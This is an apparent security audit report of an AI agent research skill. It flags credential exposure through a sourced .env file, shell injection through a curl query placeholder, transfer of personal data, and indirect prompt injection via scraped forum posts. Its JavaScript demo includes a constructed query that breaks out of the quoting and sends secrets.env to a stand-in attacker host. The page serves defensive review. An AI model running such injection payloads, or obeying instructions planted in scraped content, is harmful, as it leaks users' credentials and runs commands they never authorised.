skills/krishagel/geoffrey/research/Gen Agent Trust Hub


Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH (CREDENTIALS_UNSAFE, COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION)
Full Analysis
  • [CREDENTIALS_UNSAFE] (HIGH): The skill instructions (e.g., in agents/gemini-researcher.md) explicitly command the agent to source a .env file from a sensitive user directory (~/Library/Mobile Documents/.../secrets/.env) to load API keys. This pattern places the secrets in the agent's process environment, where every command the agent runs can read them and where they are exposed to theft if the agent process is compromised.
  • [COMMAND_EXECUTION] (HIGH): Multiple agents (gemini-researcher.md, openai-researcher.md, perplexity-researcher.md) use shell curl commands to perform API requests. The user- or web-provided research query is interpolated directly into the command string (at the YOUR_QUERY_HERE placeholder) without sanitization or escaping, so a query containing shell metacharacters can close the quoted argument and run arbitrary commands on the host.
  • [DATA_EXFILTRATION] (HIGH): The skill is designed to read highly personal data from preferences.json (loyalty program status, current points balances, and personal preferences) and transmit it to multiple external LLM providers. While functional for the research purpose, this creates a high-impact data flow of PII and financial-adjacent information to third parties.
  • [PROMPT_INJECTION] (HIGH): Exposure to Category 8 (Indirect Prompt Injection) is high. The skill is designed to scrape 'deep' content from forums such as Reddit and FlyerTalk (orchestrator.js), and malicious instructions embedded in those sources would be processed by the agent as part of its input. Because the agent has access to sensitive files and shell execution, a successful injection could result in credential theft, account compromise, or local system command execution.
  • Ingestion points: Web search results and scraped forum content (e.g., Reddit, FlyerTalk) via orchestrator.js.
  • Boundary markers: None detected in the shell command templates or LLM prompt structures.
  • Capability inventory: File system access (reading .env and preferences.json), network operations via curl, and browser control for authenticated content.
  • Sanitization: No evidence of input escaping, validation, or sanitization before string interpolation into executable commands.
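The shell injection described in the COMMAND_EXECUTION finding, and the kind of hardened invocation the Sanitization note implies is missing, as an added example that is not code from the audited skill or from the audit itself. The endpoint URL, header names, JSON body shape and the malicious query are constructed placeholders; the tokenizer is a deliberately minimal approximation of sh quoting, used only to show where the command boundary breaks.

```javascript
// Added example, not code from the audited skill. Contrasts the vulnerable
// "interpolate the query into a curl command string" pattern with a hardened
// invocation that never passes the query through a shell. The endpoint,
// header names and request body shape are placeholders.

const API_URL = "https://api.example.invalid/v1/research"; // placeholder endpoint

// Constructed attacker-controlled query (e.g. scraped from a forum post). The
// leading quote closes the template's single-quoted -d argument; everything
// after the first ';' then runs as separate shell commands.
const MALICIOUS_QUERY =
  "'; curl -s https://attacker.invalid/x -d @secrets.env; echo '";

// Vulnerable pattern: the query replaces a YOUR_QUERY_HERE-style placeholder
// inside a command string that is later handed to /bin/sh. $API_KEY is
// expanded by the shell from whatever .env was sourced into the environment.
function buildVulnerableCommand(query) {
  return (
    `curl -s -X POST ${API_URL} -H 'Authorization: Bearer $API_KEY' ` +
    `-d '{"query": "${query}"}'`
  );
}

// Minimal approximation of sh quoting: splits a command line on ';' that is
// not inside single or double quotes. It ignores backslash escapes and $(...)
// expansion, so a real shell has even more ways to break out than shown here.
function splitShellCommands(cmd) {
  const commands = [];
  let current = "";
  let quote = null;
  for (const ch of cmd) {
    if (quote !== null) {
      current += ch;
      if (ch === quote) quote = null;
    } else if (ch === "'" || ch === '"') {
      quote = ch;
      current += ch;
    } else if (ch === ";") {
      if (current.trim()) commands.push(current.trim());
      current = "";
    } else {
      current += ch;
    }
  }
  if (current.trim()) commands.push(current.trim());
  return commands;
}

// Hardened pattern: build an argv array for child_process.execFileSync (no
// shell involved) and serialise the body with JSON.stringify, so quotes,
// newlines and ';' stay inside one argument and one JSON string. The key is
// passed in explicitly rather than expanded by a shell from a sourced .env.
function buildSafeInvocation(query, apiKey) {
  const body = JSON.stringify({ query });
  return {
    file: "curl",
    args: [
      "-s", "-X", "POST", API_URL,
      "-H", `Authorization: Bearer ${apiKey}`,
      "-H", "Content-Type: application/json",
      "--data-binary", body,
    ],
    body,
  };
}

// Runs both builders on a benign and a malicious query and reports how many
// shell commands the vulnerable string would execute in each case.
function demonstrate() {
  const benign = "best lounge access at SFO terminal 2";
  return {
    benignCommandCount: splitShellCommands(buildVulnerableCommand(benign)).length,
    maliciousCommandCount: splitShellCommands(buildVulnerableCommand(MALICIOUS_QUERY)).length,
    safeBodyRoundTrips:
      JSON.parse(buildSafeInvocation(MALICIOUS_QUERY, "k").body).query === MALICIOUS_QUERY,
  };
}

console.log(JSON.stringify(demonstrate(), null, 2));
```

With the malicious query the vulnerable template splits into three shell commands, the middle one being the attacker's curl; the same query in the hardened form survives a JSON round trip as a single string inside one argv element. `execFileSync(inv.file, inv.args)` runs that argv without a shell; dropping curl altogether and calling `fetch` from the process removes the shell boundary entirely, and keeping the key out of a sourced .env addresses the CREDENTIALS_UNSAFE finding at the same time.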
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 05:30 AM